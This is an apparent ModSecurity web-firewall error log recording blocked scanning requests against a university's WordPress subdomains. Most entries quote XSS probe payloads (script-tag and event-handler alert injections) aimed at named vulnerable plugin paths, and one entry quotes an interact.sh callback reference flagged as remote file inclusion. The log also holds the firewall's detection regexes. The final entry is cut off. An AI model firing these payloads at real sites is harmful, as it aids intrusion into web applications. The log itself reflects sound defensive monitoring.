[Tue Aug 29 11:53:45.619812 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:?script:setdb('snmp','syscontact'). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:?script:setdb('snmp','syscontact'): \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/config/pw_snmp_done.html"] [unique_id "ZO152cCo-f0AAAn409QAAAAW"]
[Tue Aug 29 11:53:45.624647 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:theme_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:theme_id: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO152cCo-f0AAAo2m6kAAAAA"]
[Tue Aug 29 11:53:45.675597 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/alert-before-your-post/trunk/post_alert.php"] [unique_id "ZO152cCo-f0AAAoqbVgAAAAj"]
[Tue Aug 29 11:53:45.679027 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/alert-before-your-post/trunk/post_alert.php"] [unique_id "ZO152cCo-f0AAAoz744AAAAS"]
[Tue Aug 29 11:53:45.683679 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/alert-before-your-post/trunk/post_alert.php"] [unique_id "ZO152cCo-f0AAAoGFfAAAAAE"]
[Tue Aug 29 11:53:45.695994 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:?script:setdb('snmp','syscontact'). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:?script:setdb('snmp','syscontact'): \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/config/pw_snmp_done.html"] [unique_id "ZO152cCo-f0AAAoqbVkAAAAj"]
[Tue Aug 29 11:53:45.696351 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/alert-before-your-post/trunk/post_alert.php"] [unique_id "ZO152cCo-f0AAApHRWEAAAAP"]
[Tue Aug 29 11:53:46.552341 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php"] [unique_id "ZO152sCo-f0AAAoz748AAAAS"]
[Tue Aug 29 11:53:46.746347 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:gallery_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: 1\\x22 onmouseover= found within ARGS:gallery_id: 1\\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO152sCo-f0AAAolKZYAAAAe"]
[Tue Aug 29 11:53:46.942728 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/novius-os/admin/nos/login"] [unique_id "ZO152sCo-f0AAAoUJdgAAAAB"]
[Tue Aug 29 11:53:46.943120 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/alert-before-your-post/trunk/post_alert.php"] [unique_id "ZO152sCo-f0AAAoW7UcAAAAJ"]
[Tue Aug 29 11:53:47.052312 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php"] [unique_id "ZO1528Co-f0AAAoW7UgAAAAJ"]
[Tue Aug 29 11:53:47.062997 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php"] [unique_id "ZO1528Co-f0AAApLWjUAAAAI"]
[Tue Aug 29 11:53:47.146653 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php"] [unique_id "ZO1528Co-f0AAAolKZkAAAAe"]
[Tue Aug 29 11:53:47.157203 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php"] [unique_id "ZO1528Co-f0AAApJDTgAAAAY"]
[Tue Aug 29 11:53:47.772828 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php"] [unique_id "ZO1528Co-f0AAAoGFfUAAAAE"]
[Tue Aug 29 11:53:47.774991 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:?script:setdb('snmp','syscontact'). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:?script:setdb('snmp','syscontact'): \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/config/pw_snmp_done.html"] [unique_id "ZO1528Co-f0AAApHRWQAAAAP"]
[Tue Aug 29 11:53:47.837222 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:return_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:return_url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO1528Co-f0AAAoGFfYAAAAE"]
[Tue Aug 29 11:53:48.004249 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:return_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:return_url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO153MCo-f0AAAoGFfcAAAAE"]
[Tue Aug 29 11:53:48.067548 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:return_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:return_url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO153MCo-f0AAAoW7UwAAAAJ"]
[Tue Aug 29 11:53:48.071869 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:return_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:return_url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO153MCo-f0AAAoPueIAAAAM"]
[Tue Aug 29 11:53:48.167491 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:return_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:return_url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO153MCo-f0AAAox7KAAAAAN"]
[Tue Aug 29 11:53:48.700127 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:return_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:return_url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO153MCo-f0AAAo2m7MAAAAA"]
[Tue Aug 29 11:53:50.836600 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php"] [unique_id "ZO153sCo-f0AAAoPuekAAAAM"]
[Tue Aug 29 11:53:50.865355 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag 